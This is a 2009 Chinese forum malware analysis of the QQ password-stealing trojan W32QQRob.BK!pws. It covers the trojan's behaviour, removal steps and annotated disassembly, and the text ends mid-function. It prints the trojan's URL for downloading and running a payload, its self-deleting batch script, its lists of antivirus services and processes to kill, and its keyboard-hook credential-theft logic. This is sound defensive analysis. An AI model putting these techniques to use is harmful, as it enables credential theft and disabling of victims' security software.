- 标 题:[W32QQRob.BK!pws] 木马分析报告
- 作 者:梦旅人
- 时 间:2009-12-13 16:44
- 链 接:http://bbs.pediy.com/showthread.php?t=1030
一、概述
本文档讲述关于W32QQRob.BK!pws木马的行为、清除方法、技术细节;
该木马主要通过网络传播,其大小为118,959 字节 ,用Borland Delphi 6.0 - 7.0 编写。运行后先判断路径,如不为指定路径则将自身拷贝到"C:\WINDOWS\system32\VM_STI.EXE"下,设置成开机运行,关闭杀毒软件并使其失效,关闭正在还原精灵窗口和QQ进程,在QQ启动的时候通过钩子截取密码。该木马还从链接:"http://alaqq17e.3322.org/new.jpg"处下载文件到"c:\new.exe"并运行之。
二、行为预览
1) 病毒名称:VM_STI_1.exe
2) 病毒类型:W32QQRob.BK!pws木马
3) 病毒大小:118,959 字节
4) 传播方式:互联网
5) 相关文件:
a 【W32QQRob.BK!pws木马】分析报告.doc: 病毒分析报告
b VM_STI_1.exe.v : 病毒样本;
c Deleteme.bat : 由病毒释放的文件;
d VM_STI.idb : 病毒IDA打开文件;
6) 病毒具体行为:
a 判断操作系统版本,如果为指定类型则动态调用API将自身隐藏。寻找有无"C:\WINDOWS\system32\VM_STI.EXE",有将其设置成普通属性删除,无则将自身拷贝到这里,设置属性为READONLY|HIDDEN|SYSTEM,然后运行之。
b 路径不对则在C:\WINDOWS\system32下创建一个Deleteme.bat文件并且以CreateProcess运行Deleteme.bat,然后将自身终止,终止后Deleteme.bat不仅删除该木马也删除自身。
c 从连接"http://alaqq17e.3322.org/new.jpg"处下载文件到"c:\new.exe"并运行之。由于该链接已经失效故不知道是下载的什么文件,但是下载前会睡眠一小时,也就是说该木马有一段时间的潜伏期。文件下载后也要睡眠300秒才运行。
d 关闭杀毒软件服务,其中关闭的有:
"RsRavMon""RsCCenter""KVSrvXP""kavsvc""KWatchSvc""wscsvc" "SNDSrvc""ccProxy""ccEvtMgr""SPBBCSvc""Symantec Core LC"
"navapsvc""NPFMntor""MskService""McShield""McAfeeFramework"。
关闭正装运行的杀毒软件,其中终止以下进程:FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE RAVTIMER.EXE Iparmor.exe MAILMON.EXE KAVPFW.EXE KmailMon.EXE KAVStart.exe TrojanDetector.EXE KVFW.EXE KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE EGHOST.EXE KWatch9x.exe KvDetech.exe KVCenter.kxp UIHost.exe KATMain.EXE 寻找并关闭以下窗口TrojDie_Frame KvXP_ExpertFrame Jiangmin Registry Monitor Ex KVXP_Monitor 瑞星杀毒软件下载版 金山毒霸 2005 卡巴斯基反病毒单机版 WHXMDI0 Symantec AntiVirus 企业版 江民杀毒软件 KV2004:实时监视 天网防火墙个人版 天网防火墙企业版 噬菌体 木马克星 RavMon.exe TfLockDownMain ZoneAlarm ZAFrameWnd Tapplication 〖列举启动〗'LanCardS','原精','还原精灵','原精 DEMO','还原精灵 DEMO','原精21st','还原精灵21st','原精21st DEMO','还原精灵21st DEMO','还原精灵21st操作选择'
e 结束QQ进程,下钩子截获密码。下钩子之前删除键盘保护驱动"npkcrypt.sys",将假文件"npkcrypt.bak"拷贝过去并删除。
f 自身写入注册表使其随开机运行,然后在SYSTEM\CurrentControlSet\Services\下添加:navapsvc,RsRavMon,RsCCenter,kavsvc,KVSrvXP,wscsvc,KPfwSvc,KWatchSvc,SNDSrvc,ccProxy,ccEvtMgr,ccSetMgr,SPBBCSvc,Symantec Core LC,NPFMntor,MskService,FireSvc,McShield,McTaskManager,McAfeeFramework,并且设置子键"Start" = 4。在SoftWare\Microsoft\Windows\CurrentVersion\Run下试图删除RavMon,KAVPersonal50 RavTimer RavTask KvMonXP iDuba Personal FireWall KAVRun KpopMon Kulansyn KavPFW KvXP ccApp SSC_UserPrompt NAV CfgWiz ,MCAgentExe ,McRegWiz, MCUpdateExe ,MSKAGENTEXE ,MSKDetectorExe ,VirusScanOnline, VSOCheckTask, McAfeeUpdaterUI, Network Associates Error Reporting ,Service ,ShStatEXE ,KavStart ,Services, KWatch9x.
三、清理方式
1) 结束 "VM_STI.EXE" 和可能存在的new.exe进程
2) 删除文件"C:\WINDOWS\system32\VM_STI.EXE"和可能存在的C:\new.exe
3) 打开注册表编辑器,删除病毒的注册表启动项
4) 重新恢复可能被破坏的的反病毒程序的启动服务,重新安装上述杀毒软件
5) 由于QQ键盘保护驱动被破坏所以需恢复,建议重新安装新的QQ版本。
【以下为正文】
四、正文
PEp0:0040BA68 public start
PEp0:0040BA68 start: ; CODE XREF: PEp1:00414583 j
。。。。。。。。。。。。。。。。。。。。。。。
PEp0:0040BA94 call sub_406D7C
PEp0:0040BA99 call CallGetVersion ; 获取操作系统版本
PEp0:0040BA9E test al, al
PEp0:0040BAA0 jz short loc_40BAA7 ; 获取不对跳走
PEp0:0040BAA2 call HideMySelf ; 调用RegisterServiceProcess隐藏自身
PEp0:0040BB31 jz short loc_40BB62 ; 文件属性获取失败,跳走
PEp0:0040BB33 push 80h
PEp0:0040BB38 push ebx
PEp0:0040BB39 call SetFileAttributesA ; 设置自身文件属性
PEp0:0040BB3E push ebx
PEp0:0040BB3F call DeleteFileA ; 删除自身
PEp0:0040BB44 cmp eax, 1
PEp0:0040BB47 sbb eax, eax
PEp0:0040BB49 inc eax
PEp0:0040BB4A test al, al
PEp0:0040BB4C jnz short loc_40BB62 ; 删除成功,跳走复制文件并运行之
PEp0:0040BB4E xor eax, eax
PEp0:0040BB50 call CallExitProcess ; 将自身结束
PEp0:0040BB78 call CopyFileA ; 将自身复制到"C:\WINDOWS\system32\VM_STI.EXE"
PEp0:0040BB7D push 7
PEp0:0040BB7F push ebx
PEp0:0040BB80 call SetFileAttributesA
; 设置文件属性READONLY|HIDDEN|SYSTEM
PEp0:0040BBB9 call WinExec
; 运行"C:\WINDOWS\system32\VM_STI.EXE"
PEp0:0040BBBE mov eax, off_40C0D4
PEp0:0040BBC3 mov eax, [eax]
PEp0:0040BBC5 mov edx, offset word_40BD08
PEp0:0040BBCA call CmpString_0
PEp0:0040BBCF jnz short loc_40BBD6
PEp0:0040BBD1 call CreateDeletemeRun ; 创建Deleteme.bat并运行之,待程序结束后该文件与木马本身一并被删除其中Deleteme.bat文件内容为:
:try
del "C:\Documents and Settings\Administrator\桌面\盗QQ木马\VM_STI_1.exe"
if exist "C:\Documents and Settings\Administrator\桌面\盗QQ木马\VM_STI_1.exe" goto try
del %0
PEp0:0040BBFB mov ecx, offset CloseHUJL ; 关闭还原精灵窗口
PEp0:0040BC00 mov dl, 1
PEp0:0040BC02 mov eax, off_4048AC
PEp0:0040BC07 call CreateThreadCallFun
PEp0:0040BC0C loc_40BC0C: ; CODE XREF: PEp0:0040BBF7 j
PEp0:0040BC0C push 0
PEp0:0040BC0E mov ecx, offset DownFileRun ; 下载文件并运行
PEp0:0040BC13 mov dl, 1
PEp0:0040BC15 mov eax, off_4048AC
PEp0:0040BC1A call CreateThreadCallFun
PEp0:0040BC1F mov eax, off_40C100
PEp0:0040BC24 mov eax, [eax]
PEp0:0040BC26 mov edx, offset word_40BD08
PEp0:0040BC2B call CmpString_0
PEp0:0040BC30 jnz short loc_40BC45
PEp0:0040BC32 push 0
PEp0:0040BC34 mov ecx, offset KillAntiVirus ; 结束杀毒软件服务,使杀毒软件失效
PEp0:0040BC39 mov dl, 1
PEp0:0040BC3B mov eax, off_4048AC
PEp0:0040BC40 call CreateThreadCallFun
PEp0:0040BC45 loc_40BC45: ; CODE XREF: PEp0:0040BC30 j
PEp0:0040BC45 mov eax, off_40C114
PEp0:0040BC4A mov eax, [eax]
PEp0:0040BC4C mov edx, offset word_40BD08
PEp0:0040BC51 call CmpString_0
PEp0:0040BC56 jnz short loc_40BC6B
PEp0:0040BC58 push 0
PEp0:0040BC5A mov ecx, offset KillQQProcess ; 结束QQ进程
PEp0:0040BC5F mov dl, 1
PEp0:0040BC61 mov eax, off_4048AC
PEp0:0040BC66 call CreateThreadCallFun
PEp0:0040BC6B loc_40BC6B: ; CODE XREF: PEp0:0040BC56 j
PEp0:0040BC6B nop
PEp0:0040BC6C nop
PEp0:0040BC6D push 0
PEp0:0040BC6F mov ecx, offset ReyOfAntiViu 写入与杀软有关的注册表
PEp0:0040BC74 mov dl, 1
PEp0:0040BC76 mov eax, off_4048AC
PEp0:0040BC7B call CreateThreadCallFun
PEp0:0040BC80 push 0
PEp0:0040BC82 mov ecx, offset DelKeyGetQQ ; 在Q登录的时候窃取QQ密码
PEp0:0040BC87 mov dl, 1
PEp0:0040BC89 mov eax, off_4048AC
PEp0:0040BC8E call CreateThreadCallFun
下面是类似函数DownFileRun,CloseHUJL,KillAntiVirus,KillQQProcess,ReyOfAntiViu,DelKeyGetQQ的调用过程。由于这几个函数调用过程一摸一样,故我只选择分析DownFileRun的调用过程。
PEp0:0040BC0E mov ecx, offset DownFileRun ; 下载文件并运行
PEp0:0040BC13 mov dl, 1
PEp0:0040BC15 mov eax, off_4048AC
PEp0:0040BC1A call CreateThreadCallFun
CreateThreadCallFun函数主要是先将另一个函数CallMainExitThread地址保存到ecx,该函数调用DownFileRun 并结束自身线程,然后CreateThreadCallFun通过开一个新线程,将CallMainExitThread函数由线程函数的形式传入并且调用。新线程回调函数为StartAddress。下面是CreateThreadCallFun的实现部分:
PEp0:0040496C CreateThreadCallFun proc near ; CODE XREF: GetQQNumber+1CE p
。。。。。。。。。。。。。。。。。
PEp0:0040497E loc_40497E: ; CODE XREF: CreateThreadCallFun+8 j
PEp0:0040497E mov esi, ecx ; 类似DownFileRun代码地址
PEp0:00404980 mov ebx, edx
PEp0:00404982 mov edi, eax
PEp0:00404984 xor edx, edx
PEp0:00404986 mov eax, edi
PEp0:00404988 call sub_4031F4
PEp0:0040498D xor eax, eax
PEp0:0040498F mov [edi+0Ch], eax
PEp0:00404992 mov [edi+14h], esi ; 主体函数如DownFileRun代码地址放到[edi+14h]
PEp0:00404995 push edi
PEp0:00404996 mov eax, [ebp+arg_0] ; 取参数地址
PEp0:00404999 push eax
PEp0:0040499A lea eax, [edi+8]
PEp0:0040499D push eax
PEp0:0040499E mov ecx, offset CallMainExitThread ; 结束本线程的代码
PEp0:004049A3 xor edx, edx
PEp0:004049A5 xor eax, eax
PEp0:004049A7 call CallCreateThread ; 创建线程,并将上述结束自己线程的代码地址以线程回调函数的参数传入
。。。。。。。。。。。。。。。
PEp0:004049CA CreateThreadCallFun endp
CallCreateThread函数的作用就是开新线程,参数lpParameter就是上述CallMainExitThread函数的地址:
PEp0:00403B44 CallCreateThread proc near ; CODE XREF: CreateThreadCallFun+3B p
。。。。。。。。。。。。。。。。。。。。。。。。。。 ;
PEp0:00403B4A mov edi, ecx ; 结束线程函数地址
PEp0:00403B4C mov esi, edx
PEp0:00403B4E mov ebx, eax
PEp0:00403B50 mov eax, 8
PEp0:00403B55 call sub_4024FC
PEp0:00403B5A mov [eax], edi ; 将结束自身的代码地址放到[eax]中
PEp0:00403B5C mov edx, [ebp+arg_8] ; 取参数也就是该函数调用方传递的edi的值,其中edi+14h去内容就是主体函数地址
PEp0:00403B5F mov [eax+4], edx ; 将edx保存到[eax+4]的位置,然后在结束自身和调用主体函数的时候恢复
PEp0:00403B62 mov byte_40D035, 1
PEp0:00403B69 mov edx, [ebp+lpThreadId]
PEp0:00403B6C push edx ; lpThreadId
PEp0:00403B6D mov edx, [ebp+dwCreationFlags]
PEp0:00403B70 push edx ; dwCreationFlags
PEp0:00403B71 push eax ; lpParameter
PEp0:00403B72 mov eax, offset StartAddress
PEp0:00403B77 push eax ; lpStartAddress
PEp0:00403B78 push esi ; dwStackSize
PEp0:00403B79 push ebx ; lpThreadAttributes
PEp0:00403B7A call CreateThread ; 参数lpParameter也就是eax取内容为00404900
…………..
PEp0:00403B83 CallCreateThread endp
线程回调函数StartAddress主要赋值然后调用CallMainExitThread
PEp0:00403B0C ; DWORD __stdcall StartAddress(LPVOID)
PEp0:00403B0C StartAddress proc near ; DATA XREF: CallCreateThread+2E o
。。。。。。。。。。。。。。。。。。。。。。。。。。
PEp0:00403B23 mov eax, [ebp+arg_0] ; 取线程回调函数的参数,本次调试这里对其取内容为00404900
PEp0:00403B26 mov ecx, [eax+4] ; 这里恢复00404992地址代码中的edi到这里的ecx
PEp0:00403B29 mov edx, [eax] ; 以eax中的值为地址,取内容赋edx,这里是00404900
PEp0:00403B2B push ecx
PEp0:00403B2C push edx
PEp0:00403B2D call sub_40251C
PEp0:00403B32 pop edx
PEp0:00403B33 pop eax ; 将ecx的值放入eax
PEp0:00403B34 call edx ; 调用00404900中的代码即调用CallMainExitThread
PEp0:00403B3F StartAddress endp
CallMainExitThread函数就是动态DownFileRun等函数,并将自身线程终止。
PEp0:00404900 CallMainExitThread proc near ; DATA XREF: CreateThreadCallFun+32 o
。。。。。。。。。。。。。。。。。。。
PEp0:00404907 mov [ebp+var_4], eax ; 将00404992地址代码中的edi值放到到这里
PEp0:0040490A mov eax, [ebp+var_4]
PEp0:0040490D mov byte ptr [eax+10h], 0
PEp0:00404911 xor eax, eax
PEp0:00404913 push ebp
PEp0:00404914 push offset loc_40495F
PEp0:00404919 push dword ptr fs:[eax]
PEp0:0040491C mov fs:[eax], esp
PEp0:0040491F mov ebx, [ebp+var_4] ; 将00404992地址代码中的edi到这里的ebx
PEp0:00404922 mov eax, [ebp+var_4]
PEp0:00404925 call dword ptr [ebx+14h] ; 由于在00404992地址代码edi+14h取内容是主体函数地址,故这里调用如DownFileRun
PEp0:00404928 xor eax, eax
PEp0:0040492A pop edx
PEp0:0040492B pop ecx
PEp0:0040492C pop ecx
PEp0:0040492D mov fs:[eax], edx
PEp0:00404930 push offset loc_404966
PEp0:00404935 loc_404935: ; CODE XREF: PEp0:00404964 j
PEp0:00404935 lea eax, [ebp+dwExitCode]
PEp0:00404938 push eax ; lpExitCode
PEp0:00404939 mov eax, [ebp+var_4]
PEp0:0040493C mov eax, [eax+4]
PEp0:0040493F push eax ; hThread
PEp0:00404940 call GetExitCodeThread
PEp0:00404945 mov eax, [ebp+var_4]
PEp0:00404948 mov edx, [ebp+dwExitCode]
PEp0:0040494B mov [eax+0Ch], edx
PEp0:0040494E mov eax, [ebp+var_4]
PEp0:00404951 mov byte ptr [eax+10h], 1
PEp0:00404955 mov eax, [ebp+dwExitCode]
PEp0:00404958 push eax ; dwExitCode
PEp0:00404959 call ExitThread
PEp0:00404959 CallMainExitThread endp
下面是类似函数DownFileRun,CloseHUJL,KillAntiVirus,KillQQProcess,ReyOfAntiViu,DelKeyGetQQ的具体实现部分
======================================================================
DownFileRun的作用就是下载文件并执行,其中下载链接为http://alaqq17e.3322.org/new.jpg,下载到c:\new.exe。链接和名字都被加密在执行的过程中解开。还有下载前有一个小时的潜伏期,下载后也潜伏五分钟后再执行。由于该链接已经失效故不知道这里下载的是什么文件。
PEp0:0040AC7C DownFileRun proc near ; DATA XREF:
。。。。。。。。。。。。。。。。。。。。
PEp0:0040AC97 push 36EE80h ; dwMilliseconds
PEp0:0040AC9C call Sleep ; 睡眠一小时
PEp0:0040ACA1 mov eax, offset byte_40D79C
PEp0:0040ACA6 mov edx, offset asc_40AD88 ; " "
PEp0:0040ACAB call sub_403BDC
PEp0:0040ACB0 mov eax, offset byte_40D79C
PEp0:0040ACB5 mov edx, offset asc_40AD88 ; " "
PEp0:0040ACBA call sub_403BDC
PEp0:0040ACBF lea edx, [ebp+var_8]
PEp0:0040ACC2 mov eax, offset aTrmXs@mirpjhoh ; "TRm]XS@mIrPjHoHnH^ukXbX"
PEp0:0040ACC7 call RevertString
PEp0:0040ACCC mov eax, [ebp+var_8]
PEp0:0040ACCF lea edx, [ebp+var_4]
PEp0:0040ACD2 call CallWSAStrart ; 初始化网络
PEp0:0040ACD7 lea edx, [ebp+var_C]
PEp0:0040ACDA mov eax, offset aHntmg_@jhl ; "HNtmG_@jHL"
PEp0:0040ACDF call RevertString ; 还原字符串
PEp0:0040ACE4 mov edx, [ebp+var_C]
PEp0:0040ACE7 mov eax, [ebp+var_4]
PEp0:0040ACEA call sub_403E4C
PEp0:0040ACEF jz short loc_40AD57
PEp0:0040ACF1 xor ebx, ebx
PEp0:0040ACF3 mov esi, 0Bh
PEp0:0040ACF8 loc_40ACF8: ; CODE XREF:
PEp0:0040ACF8 lea edx, [ebp+var_10]
PEp0:0040ACFB mov eax, offset aToexwbqsgbqtul
; "ToeXWbQsGbQtUL"
PEp0:0040AD00 call RevertString ; 还原字符串
PEp0:0040AD05 mov eax, [ebp+var_10]
PEp0:0040AD08 push eax
PEp0:0040AD09 lea edx, [ebp+var_14]
PEp0:0040AD0C mov eax, offset aVcmpx?dkgrahts ; "VCMpX?dkGrAhTSAmHOYaG_HoH_DjWsEcGruaYnu"...
PEp0:0040AD11 call RevertString ; 还原字符串
PEp0:0040AD16 mov eax, [ebp+var_14]
PEp0:0040AD19 pop edx
PEp0:0040AD1A call InternetRead_0 ;
从"http://alaqq17e.3322.org/new.jpg"读取数据
PEp0:0040AD1F test al, al
PEp0:0040AD21 jnz short loc_40AD2F
PEp0:0040AD23 push 493E0h ; dwMilliseconds
PEp0:0040AD28 call Sleep
PEp0:0040AD2D jmp short loc_40AD33
PEp0:0040AD2F loc_40AD2F: ; CODE XREF:
PEp0:0040AD2F mov bl, 1
PEp0:0040AD31 jmp short loc_40AD36
PEp0:0040AD33 loc_40AD33: ; CODE XREF:
PEp0:0040AD33 dec esi
PEp0:0040AD34 jnz short loc_40ACF8
PEp0:0040AD36 loc_40AD36: ; CODE XREF:
PEp0:0040AD36 test bl, bl
PEp0:0040AD38 jz short loc_40AD57
PEp0:0040AD3A push 0 ; uCmdShow
PEp0:0040AD3C lea edx, [ebp+var_18]
PEp0:0040AD3F mov eax, offset aToexwbqsgbqtul ; "ToeXWbQsGbQtUL"
PEp0:0040AD44 call RevertString ; 还原字符串
PEp0:0040AD49 mov eax, [ebp+var_18]
PEp0:0040AD4C call Test_eax_1
PEp0:0040AD51 push eax ; lpCmdLine
PEp0:0040AD52 call WinExec ; 运行"c:\new.exe"
………………
PEp0:0040AD7E DownFileRun endp
KillAntiVirus函数的作用主要是停止杀毒软件服务,关闭指定的杀毒软件窗口。关闭窗口的操作是每个3秒钟不断循环。
PEp0:0040AE0C KillAntiVirus: ; DATA XREF: PEp0:0040BC34 o
PEp0:0040AE0C call KillAntiVirus_1
PEp0:0040AE11 loc_40AE11: ; CODE XREF:
PEp0:0040AE11 call CloseAntiVirus
PEp0:0040AE16 push 0BB8h
PEp0:0040AE1B call Sleep ; 睡眠3秒钟
PEp0:0040AE20 jmp short loc_40AE11
PEp0:0040AE22 retn
KillAntiVirus_1只是调用StopProcservice停止杀软进程,其中关闭的有:"RsRavMon""RsCCenter""KVSrvXP""kavsvc""KWatchSvc""wscsvc" "SNDSrvc""ccProxy""ccEvtMgr""SPBBCSvc""Symantec Core LC"
"navapsvc""NPFMntor""MskService""McShield""McAfeeFramework"
StopProcservice通过发送控制码1停止服务
PEp0:0040969C StopProcservice proc near ; CODE XREF:
。。。。。。。。。。 。。。。。。。。
PEp0:004096C8 push 0F003Fh ; dwDesiredAccess
PEp0:004096CD push 0 ; lpDatabaseName
PEp0:004096CF push 0 ; lpMachineName
PEp0:004096D1 call OpenSCManagerA
PEp0:004096D6 mov edi, eax
PEp0:004096D8 test edi, edi
PEp0:004096DA jbe short loc_40974C
PEp0:004096DC push 0F01FFh ; dwDesiredAccess
PEp0:004096E1 push esi ; lpServiceName
PEp0:004096E2 push edi ; hSCManager
PEp0:004096E3 call OpenServiceA
PEp0:004096E8 mov esi, eax
PEp0:004096EA test esi, esi
PEp0:004096EC jbe short loc_409746
PEp0:004096EE push offset ServiceStatus ; lpServiceStatus
PEp0:004096F3 push 1 ; dwControl
PEp0:004096F5 push esi ; hService
PEp0:004096F6 call ControlService ;
发送控制码1为SERVICE_CONTROL_STOP停止服务
PEp0:004096FB test eax, eax
PEp0:004096FD jz short loc_40974C ; 停止失败跳走退出
PEp0:004096FF push 3E8h ; dwMilliseconds
PEp0:00409704 call Sleep ; 睡眠一秒钟跳走
PEp0:00409709 jmp short loc_40971E
PEp0:0040970B loc_40970B: ; CODE XREF:
PEp0:0040970B cmp ServiceStatus.dwCurrentState, 3
PEp0:00409712 jnz short loc_40972D ; 确定该服务未停止,跳走
PEp0:00409714 push 3E8h ; dwMilliseconds
PEp0:00409719 call Sleep
PEp0:0040971E loc_40971E: ; CODE XREF:
PEp0:0040971E push offset ServiceStatus ; lpServiceStatus
PEp0:00409723 push esi ; hService
PEp0:00409724 call QueryServiceStatus ; 接受该服务的当前状态
PEp0:00409729 test eax, eax
PEp0:0040972B jnz short loc_40970B ; 接受成功跳走
PEp0:0040972D loc_40972D: ; CODE XREF: StopProcservice+76 j
PEp0:0040972D cmp ServiceStatus.dwCurrentState, 1
PEp0:00409734 jz short loc_40974C ; 确定服务已经不再运行跳走
。。。。。。。。。。。。。。
PEp0:00409770 StopProcservice endp
CloseAntiVirus函数主要是通过窗口名调用FindWindowA函数获取窗口句柄,然后通过PostMessage发送WM_QUIT消息关闭当前指定的杀毒软件窗口,其中第一步为破坏密码防盗专家,然后关闭正装运行的杀毒软件,其中终止一下窗口名有:FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE RAVTIMER.EXE Iparmor.exe MAILMON.EXE KAVPFW.EXE KmailMon.EXE KAVStart.exe TrojanDetector.EXE KVFW.EXE KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE EGHOST.EXE KWatch9x.exe KvDetech.exe KVCenter.kxp UIHost.exe KATMain.EXE关闭一下正在运行的窗口TrojDie_Frame KvXP_ExpertFrame Jiangmin Registry Monitor Ex KVXP_Monitor 瑞星杀毒软件下载版 金山毒霸 2005 卡巴斯基反病毒单机版 WHXMDI0 Symantec AntiVirus 企业版 江民杀毒软件 KV2004:实时监视 天网防火墙个人版 天网防火墙企业版 噬菌体 木马克星 RavMon.exe TfLockDownMain ZoneAlarm ZAFrameWnd Tapplication 〖列举启动〗
ReyOfAntiViu函数首先将自身写入注册表使其随开机运行,然后在SYSTEM\CurrentControlSet\Services\下添加:navapsvc,RsRavMon,RsCCenter,kavsvc,KVSrvXP,wscsvc,KPfwSvc,KWatchSvc,SNDSrvc,ccProxy,ccEvtMgr,ccSetMgr,SPBBCSvc,Symantec Core LC,NPFMntor,MskService,FireSvc,McShield,McTaskManager,McAfeeFramework,并且设置子键"Start" = 4。在SoftWare\Microsoft\Windows\CurrentVersion\Run下试图删除RavMon,KAVPersonal50 RavTimer RavTask KvMonXP iDuba Personal FireWall KAVRun KpopMon Kulansyn KavPFW KvXP ccApp SSC_UserPrompt NAV CfgWiz ,MCAgentExe ,McRegWiz, MCUpdateExe ,MSKAGENTEXE ,MSKDetectorExe ,VirusScanOnline, VSOCheckTask, McAfeeUpdaterUI, Network Associates Error Reporting ,Service ,ShStatEXE ,KavStart ,Services, KWatch9x
DelKeyGetQQ函数的作用就是首先检查有无键盘保护驱动,有则将其破坏删除,之后下钩子盗取QQ号
PEp0:0040AB2C DelKeyGetQQ proc near ; DATA XREF:
。。。。。。。。
PEp0:0040AB58 mov edx, offset aSoftwareTencen ; "SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1"
PEp0:0040AB5D mov eax, 80000002h
PEp0:0040AB62 call CallRegQueryValue ; 读取注册表的值
PEp0:0040AB8B mov ecx, offset aNpkcrypt_sys ; "npkcrypt.sys"
PEp0:0040AB90 call sub_403D4C
PEp0:0040AB95 mov eax, [ebp+var_4]
PEp0:0040AB98 call Test_eax_1
PEp0:0040AB9D mov ebx, eax
PEp0:0040AB9F push ebx ; lpFileName
PEp0:0040ABA0 call GetFileAttributesA ; 获取"npkcrypt.sys"属性
。。。。。。。。。。。。。。
PEp0:0040ABDF push eax ; lpNewFileName
PEp0:0040ABE0 push ebx ; lpExistingFileName
PEp0:0040ABE1 call CopyFileA ; 将"npkcrypt.bak"复制到"npkcrypt.sys"
PEp0:0040ABE6 push ebx ; lpFileName
PEp0:0040ABE7 call DeleteFileA ; 删除"npkcrypt.sys"将QQ键盘保护驱动彻底破坏
PEp0:0040ABEC loc_40ABEC: ; CODE XREF:
PEp0:0040ABEC call SetHookGetQQ ; 下钩子盗号
PEp0:0040ABEC DelKeyGetQQ endp
SetHookGetQQ主要通过一系列调用GetQQ函数,GetQQ函数主要就是获得QQ号和密码,然后发送到指定的服务器上。该函数对WM_CANCELJOURNAL消息做了单独处理,其中以鼠标左键单击消息为判断点,截获左键单击消息,从判断光标位置,如果适当则从"ComboBox"中通过发送消息的形式获取QQ号码,通过其他消息则以第一次按键为标准,在"Edit"控件中通过截取键盘状态和发送消息的形式获取密码。
PEp0:00408340 ; LRESULT __stdcall GetQQ(int, WPARAM, LPARAM)
PEp0:00408363 cmp dword ptr [ebx], 201h ; 左键按下消息
PEp0:00408369 jnz short Go_GetPassWord ; 非按左键跳走获取密码
PEp0:0040836B mov ecx, ebx
PEp0:0040836D mov edx, edi
PEp0:0040836F mov eax, esi
PEp0:00408371 call GetQQNumber ; 通过从"ComboBox"控件获取QQ号码
PEp0:00408376 Go_GetPassWord: ; CODE XREF: GetQQ+29 j
PEp0:00408376 cmp dword ptr [ebx], 100h ; WM_KEYFIRST消息
PEp0:0040837C jnz short Go_Out_1 ; 消息不对,非第一次按键跳走
PEp0:0040837E mov ecx, ebx
PEp0:00408380 mov edx, edi
PEp0:00408382 mov eax, esi
PEp0:00408384 call GetQQPassword ; 通过从"Edit"控件获得QQ密码
GetQQNumber函数在对拦截鼠标左键的处理函数,其中首先通过QQ界面上的静态控件来判断是否为QQ登陆框,然后在判断点击的是否为登陆按钮,如果是则发送WM_GETTEXT获取"ComboBox"控件里的值,也即是窃取了QQ号码。
PEp0:00407D6C GetQQNumber proc near ; CODE XREF: GetQQ+31 p
。。。。。。。。。。。
PEp0:00407D8B call GetActiveWindow ; 取得当前活动窗口
PEp0:00407D90 mov ebx, eax
PEp0:00407D92 push 14h ; nMaxCount
PEp0:00407D94 lea eax, [ebp+lParam]
PEp0:00407D97 push eax ; lpClassName
PEp0:00407D98 push ebx ; hWnd
PEp0:00407D99 call GetClassNameA ; 取得活动窗口的类名
PEp0:00407D9E lea eax, [ebp+var_7C]
PEp0:00407DA1 lea edx, [ebp+lParam]
PEp0:00407DA4 mov ecx, 33h
PEp0:00407DA9 call CmpString_1 ; 不相等则重复查找字符串
PEp0:00407DAE mov eax, [ebp+var_7C]
PEp0:00407DB1 mov edx, offset a32770_3 ; "#32770"
PEp0:00407DB6 call sub_403E4C
PEp0:00407DBB jnz Go_Out
PEp0:00407DC1 push offset szWindow ; "注册新号码"
PEp0:00407DC6 push offset szClass ; "Static"
PEp0:00407DCB push 0 ; hWndChildAfter
PEp0:00407DCD push ebx ; hWndParent
PEp0:00407DCE call FindWindowExA
PEp0:00407DD3 mov esi, eax
PEp0:00407DD5 push offset aQqIg ; "QQ号码:"
PEp0:00407DDA push offset szClass ; "Static"
PEp0:00407DDF push 0 ; hWndChildAfter
PEp0:00407DE1 push ebx ; hWndParent
PEp0:00407DE2 call FindWindowExA
PEp0:00407DE7 mov edi, eax
PEp0:00407DE9 push offset aZI ; "用户号码:"
PEp0:00407DEE push offset szClass ; "Static"
PEp0:00407DF3 push 0 ; hWndChildAfter
PEp0:00407DF5 push ebx ; hWndParent
PEp0:00407DF6 call FindWindowExA
PEp0:00407DFB mov [ebp+var_4], eax
PEp0:00407DFE push offset zhanghaoshuoming ; "帐号说明"
PEp0:00407E03 push offset szClass ; "Static"
PEp0:00407E08 push 0 ; hWndChildAfter
PEp0:00407E0A push ebx ; hWndParent
PEp0:00407E0B call FindWindowExA
PEp0:00407E10 test esi, esi
PEp0:00407E12 jnz short Go_ToGetNumber ; 存在"注册新号码"静态控件
PEp0:00407E14 test edi, edi
PEp0:00407E16 jnz short Go_ToGetNumber ; 存在"QQ号码:"静态控件
PEp0:00407E18 cmp [ebp+var_4], 0
PEp0:00407E1C jnz short Go_ToGetNumber ; 存在"用户号码:"静态控件
PEp0:00407E1E test eax, eax
PEp0:00407E20 jz Go_Out ; 包含"帐号说明"在内一切控件都不在,跳走退出
PEp0:00407E26 Go_ToGetNumber: ; CODE XREF:
PEp0:00407E26 push offset aQq ; " 登录QQ"
PEp0:00407E2B push offset aButton ; "Button"
PEp0:00407E30 push 0 ; hWndChildAfter
PEp0:00407E32 push ebx ; hWndParent
PEp0:00407E33 call FindWindowExA
PEp0:00407E38 mov esi, eax
PEp0:00407E3A push offset aTm ; " 登录TM"
PEp0:00407E3F push offset aButton ; "Button"
PEp0:00407E44 push 0 ; hWndChildAfter
PEp0:00407E46 push ebx ; hWndParent
PEp0:00407E47 call FindWindowExA
PEp0:00407E4C mov edi, eax
PEp0:00407E4E push offset asc_407FE8 ; "登录"
PEp0:00407E53 push offset aButton ; "Button"
PEp0:00407E58 push 0 ; hWndChildAfter
PEp0:00407E5A push ebx ; hWndParent
PEp0:00407E5B call FindWindowExA
PEp0:00407E60 mov [ebp+hWnd], eax
PEp0:00407E63 lea eax, [ebp+Rect]
PEp0:00407E66 push eax ; lpRect
PEp0:00407E67 push esi ; hWnd
PEp0:00407E68 call GetWindowRect ; 获取"登录QQ"矩形尺寸
PEp0:00407E6D lea eax, [ebp+rc]
PEp0:00407E70 push eax ; lpRect
PEp0:00407E71 push edi ; hWnd
PEp0:00407E72 call GetWindowRect ; 获取" 登录TM"尺寸
PEp0:00407E77 lea eax, [ebp+var_77]
PEp0:00407E7A push eax ; lpRect
